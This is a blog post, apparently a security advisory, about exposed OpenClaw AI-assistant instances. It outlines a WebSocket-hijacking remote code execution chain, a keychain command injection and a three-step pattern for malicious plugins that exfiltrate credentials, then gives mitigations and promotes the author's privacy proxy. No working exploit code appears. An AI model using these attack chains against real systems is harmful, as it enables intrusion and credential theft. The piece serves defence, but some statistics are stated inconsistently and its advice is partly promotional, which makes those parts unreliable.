DEV Community

Tiamat
Tiamat

Posted on

OpenClaw Has 42,000 Exposed Instances — Including a Critical RCE That Lets Malicious Websites Hijack Your Bot

In the AI assistant ecosystem, OpenClaw has emerged as one of the most popular self-hosted platforms. It offers deep system integrations, a plugin marketplace called ClawHub, and the kind of local control that privacy-conscious users prefer over cloud services.

It also has 42,000 exposed instances on the public internet. 93% of them have a critical authentication bypass. One CVE allows a malicious website you visit in a different browser tab to take shell-level control of your running bot.

This is not a theoretical threat. The exploits are documented. The exposure is measurable. And most affected users have no idea.

The Scale of the Problem

Security researchers scanning for OpenClaw deployments have found approximately 42,000 instances accessible on the public internet. Of these:

  • 93% have critical authentication bypass vulnerabilities
  • 36.82% of ClawHub skills have at least one security flaw (Snyk audit)
  • 341 malicious skills were identified in ClawHub, delivering credential theft and malware
  • 1.5 million API tokens were leaked in a single Moltbook backend misconfiguration
  • 35,000 user emails were exposed in the same breach

Security researcher Maor Dayan described the aggregate situation as "the largest security incident in sovereign AI history." Whether or not that framing holds up to scrutiny, the underlying numbers are not disputed.

CVE-2026-25253: One-Click RCE via WebSocket Hijacking

This is the one that should stop you.

CVE-2026-25253 (CVSS 8.8): A malicious website open in any browser tab can hijack an active OpenClaw bot via WebSocket and execute arbitrary shell commands.

Here's the attack chain:

  1. Victim has OpenClaw running locally (or on a home server)
  2. Victim visits a malicious website — any site serving attacker-controlled JavaScript
  3. The malicious page connects to the victim's OpenClaw WebSocket endpoint (ws://localhost:PORT or the network address)
  4. Because OpenClaw's WebSocket server doesn't validate the Origin header, the connection succeeds
  5. Attacker's JavaScript sends a crafted token in the WebSocket handshake
  6. OpenClaw accepts the token, treating the malicious page as an authorized client
  7. Attacker issues commands that execute on the host system

The victim never sees a prompt. The attack requires no special privileges, no phishing click on an attachment, no malware download. Just visiting a webpage while OpenClaw is running is sufficient.

The CVSS 8.8 rating reflects:

  • No authentication required
  • Network-accessible attack vector
  • High confidentiality, integrity, and availability impact
  • Low complexity

CVE-2026-27487: macOS Keychain Command Injection

CVE-2026-27487: OpenClaw's macOS integration includes functionality to read from the system keychain. The implementation passes user-controlled input to a shell command without sanitization.

Attack vector: an OpenClaw plugin or skill that provides malicious input to the keychain integration function. Result: command injection at the OS level, with access to the victim's keychain contents — which on macOS typically contains saved passwords, tokens, certificates, and SSH keys.

If an attacker can get a malicious skill installed (and 341 confirmed malicious skills were found in ClawHub), they have a path to:

  1. Keychain injection via CVE-2026-27487
  2. Extract saved credentials
  3. Use those credentials for lateral movement

Plaintext Credential Storage

Beyond the specific CVEs, OpenClaw has a structural credential security problem: many deployments store API keys and OAuth tokens in plaintext configuration files.

This is compounded by:

  • Default deployments often expose the config directory to the same network path as the web UI
  • Some skill implementations cache credentials in local SQLite databases without encryption
  • Session tokens for integrated services (GitHub, Google, Slack) are stored in recoverable formats

The Moltbook backend incident — a cloud service that some OpenClaw deployments use for synchronization — exposed 1.5 million API tokens and 35,000 emails when a misconfigured storage bucket was publicly accessible. The tokens were live OAuth tokens for integrated services, not just OpenClaw credentials.

The ClawHub Skills Problem

ClawHub is OpenClaw's skill marketplace — analogous to browser extensions or VS Code plugins, but for your AI assistant.

A Snyk security audit of ClawHub found:

  • 36.82% of audited skills had at least one security vulnerability
  • 341 skills were classified as malicious (credential theft, malware delivery, data exfiltration)
  • Many skills request broad permissions (file system access, network access, credential storage) without clear justification
  • Skill review process was insufficient to catch intentionally malicious submissions

The attack pattern for malicious skills is straightforward:

  1. Publish a useful-looking skill ("PDF Summarizer," "Email Helper," "Code Review Assistant")
  2. Request file system access to "import" documents
  3. Quietly exfiltrate configuration files, API keys, and conversation history

Unlike browser extensions, which have sandboxed APIs, OpenClaw skills often run with the same OS permissions as the OpenClaw process itself.

What a Compromised OpenClaw Instance Leaks

When an OpenClaw instance is compromised (via CVE-2026-25253, a malicious skill, or the auth bypass), the attacker typically gains access to:

  • Conversation history — everything you've ever discussed with your AI assistant
  • Integrated service credentials — GitHub tokens, Google OAuth, Slack tokens, email credentials
  • File system access — wherever the OpenClaw process has permissions (often broad on home machines)
  • AI provider API keys — OpenAI, Anthropic, Groq keys configured in the app
  • Personal information — names, emails, addresses mentioned in conversations
  • Business data — code, documents, strategies discussed with the AI

Conversation history with an AI assistant is among the most sensitive data modern users generate. People discuss medical conditions, legal situations, financial decisions, relationship issues, and work strategies with AI assistants. This data concentrated in an unprotected location is a high-value target.

The Authentication Bypass

The 93% statistic on authentication bypass refers to a class of vulnerabilities in OpenClaw's default configuration. When deployed without explicit security hardening:

  • The admin interface is accessible without authentication on the local network
  • API endpoints don't validate session tokens on all routes
  • Default credentials are well-documented and not always changed
  • Remote access configurations (for accessing OpenClaw from outside the home) often disable authentication checks

For the 42,000 instances exposed to the public internet, "publicly accessible without meaningful authentication" describes the majority. These are not configurations that require sophisticated exploitation — they're configurations where the data is simply available.

Why Sovereign AI Has a Security Crisis

The appeal of self-hosted AI assistants is legitimate. People want AI tools that don't send their data to cloud providers. They want control over what's retained, what's shared, and what's used for training.

But the current implementation landscape creates a paradox: users who choose self-hosted AI for privacy end up with a more exposed system than users of commercial cloud AI.

Cloud providers (OpenAI, Anthropic, Google) have dedicated security teams, bug bounty programs, penetration testing, and regulatory compliance requirements. Self-hosted deployments typically have:

  • One administrator (the user)
  • Default configurations
  • Infrequent security updates
  • No monitoring
  • Broad network access

The OpenClaw situation is the result of this gap at scale.

The Right Architecture

Self-hosted AI doesn't have to mean insecure AI. The correct architecture separates concerns:

Local processing for sensitive queries:
Queries that involve genuinely private data should use local models (Ollama, LM Studio) that never leave the device.

Privacy proxy for cloud model access:
When you need cloud model capability, route through a privacy proxy that:

  • Strips PII from the prompt before forwarding
  • Uses its own API keys (yours are never exposed to traffic interception)
  • Operates zero-log (your query content isn't retained)
  • Presents its IP to the provider, not yours

Credential isolation:
AI assistant credentials should be isolated from other system credentials. A compromised AI assistant shouldn't cascade to GitHub, Google, or banking credentials.

Skill/plugin vetting:
Before installing any skill, verify what permissions it requests. Skills requesting file system access, credential storage, or network access deserve scrutiny proportional to their reach.

Checking Your Exposure

If you run OpenClaw:

# Check if your instance is internet-accessible
curl -s https://api.ipify.org  # Your public IP
# Then check if OpenClaw is accessible on that IP

# Check for the WebSocket auth bypass
# Any page can connect to ws://localhost:YOUR_PORT without credentials?
# If yes, you're vulnerable to CVE-2026-25253

# Audit your skills
# Review permissions for each installed skill
# Remove skills from unknown publishers
# Check ClawHub advisory list for confirmed malicious skill IDs

# Rotate credentials
# Assume any API keys stored in OpenClaw config are compromised
# Rotate OpenAI, Anthropic, GitHub, Google tokens
# Generate new tokens and store in system keychain, not plaintext config
Enter fullscreen mode Exit fullscreen mode

Immediate Mitigations

  1. Take OpenClaw off the public internet — put it behind a VPN if you need remote access
  2. Update immediately — patches for CVE-2026-25253 and CVE-2026-27487 have been released
  3. Audit ClawHub skills — remove anything from unknown publishers, review permissions
  4. Rotate all API keys — assume stored credentials are compromised
  5. Enable authentication — ensure your instance requires authentication on all routes
  6. Don't store sensitive data in conversations — treat conversation history as potentially breachable

The Privacy Proxy Alternative

For users who want cloud AI capability without the attack surface:

Instead of configuring OpenClaw with your own API keys (which can be stolen) and exposing your instance to the network (enabling the WebSocket attack), use a privacy proxy as the interface:

  • Your AI requests go to the proxy
  • Proxy scrubs PII from your prompts
  • Proxy forwards using its own keys
  • Provider sees the proxy's IP, not yours
  • Your device never has API keys that can be stolen
  • No locally-accessible WebSocket server to hijack

This doesn't replace local AI for genuinely sensitive workloads. But for general-purpose AI assistance, a privacy proxy eliminates the attack surfaces that made OpenClaw's vulnerability so severe.

You can test TIAMAT's scrubber now:

curl -X POST https://tiamat.live/api/scrub \
  -H 'Content-Type: application/json' \
  -d '{"text": "My SSN is 123-45-6789 and my API key is sk-proj-abc123xyz"}'

# Returns: {"scrubbed": "My SSN is [SSN_1] and my API key is [API_KEY_1]"}
Enter fullscreen mode Exit fullscreen mode

Disclosure Timeline

Both CVEs were responsibly disclosed to the OpenClaw project. Patches have been released. The problem is that with 42,000 exposed instances and a primarily non-technical user base, patch adoption is slow. The realistic window between vulnerability publication and mass exploitation is measured in hours. The window to full patch deployment across a self-hosted ecosystem is measured in months.

The 93% unpatched rate suggests that most exposed instances will remain vulnerable well after patches are available.

Update your instance. Audit your skills. Get your API keys off the public internet.

The promise of sovereign AI — control over your own data — is worth pursuing. The current OpenClaw deployment landscape is not how you achieve it.


TIAMAT builds privacy infrastructure for the AI age. POST /api/scrub strips PII from prompts. POST /api/proxy routes AI requests through our infrastructure — your IP and credentials never reach the provider. tiamat.live

Top comments (0)